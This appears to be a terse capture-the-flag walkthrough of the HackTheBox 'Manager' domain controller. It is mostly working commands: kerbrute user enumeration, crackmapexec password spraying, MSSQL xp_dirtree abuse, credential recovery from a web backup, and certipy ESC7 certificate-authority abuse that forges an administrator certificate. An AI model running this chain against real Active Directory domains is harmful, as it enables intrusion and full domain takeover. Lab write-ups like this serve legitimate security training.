Â
53/tcp open domain 80/tcp open http 88/tcp open kerberos-sec 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 464/tcp open kpasswd5 593/tcp open http-rpc-epmap 1433/tcp open ms-sql-s 3268/tcp open globalcatLDAP 3269/tcp open globalcatLDAPssl 5985/tcp open wsman 49667/tcp open unknown 49691/tcp open unknown 49693/tcp open unknown 49695/tcp open unknown 49707/tcp open unknown
53,80,88,135,139,445,464,593,1433,3268,3269,5985,49667,49691,49693,49695,49707
echo "10.129.42.4 manager.htb dc.manager.htb" >> /etc/hosts
Â
All unaccessible
kerbrute userenum -d manager.htb --dc dc.manager.htb /opt/useful/SecLists/Usernames/xato-net-10-million-usernames.txt >>users
cat users | grep VALID | awk -F '@' '{print $1}'| awk -F ':' '{print $4}' | tr -d '\t ' >> userlist
crackmapexec smb manager.htb -u userlist -p userlist
get a smb credential
operator:operator
try to connect mssql
mssqlclient.py -port 1433 manager.htb/operator:operator@manager.htb -windows-auth
try to inject commands
EXEc xp_dirtree 'C:\inetpub\wwwroot', 1, 1;
wget manager.htb/website-backup-27-07-23-old.zip
get a credential
raven:R4v3nBe5tD3veloP3r!123
gain the initial access
Privilege Name Description State ============================= ============================== ======= SeMachineAccountPrivilege Add workstations to domain Enabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeMachineAccountPrivilege is enabled
most of the time certify.exe is not present in the server machine ,in my case it was not present
to find vulnerability from certificate templates
./Certify.exe find /vulnarable
pip3 install certipy-ad
certipy find -vulnerable -stdout -u raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.129.100.121
Â
there is a glitch with htb server, im trynna reset it later.
certipy find -vulnerable -stdout -u raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.129.134.19
or
./Certify.exe find /vulnarable
again
search ESC7 exploit, follow
certipy ca -ca 'manager-DC01-CA' -add-officer raven -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123'
certipy ca -ca 'manager-DC01-CA' -enable-template SubCA -username 'raven@manager.htb' -password 'R4v3nBe5tD3veloP3r!123'
Â
certipy req -username 'raven@manager.htb' -password 'R4v3nBe5tD3veloP3r!123' -ca 'manager-DC01-CA' -target manager.htb -template SubCA -upn 'administrator@manager.htb'
certipy ca -ca 'manager-DC01-CA' -issue-request 13 -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123'
certipy req -username 'raven@manager.htb' -password 'R4v3nBe5tD3veloP3r!123' -ca 'manager-DC01-CA' -target manager.htb -retrieve 13
certipy auth -pfx administrator.pfx -username administrator -domain manager.htb -dc-ip 10.129.134.19
login with the retrieved credential
got the administrator!
Â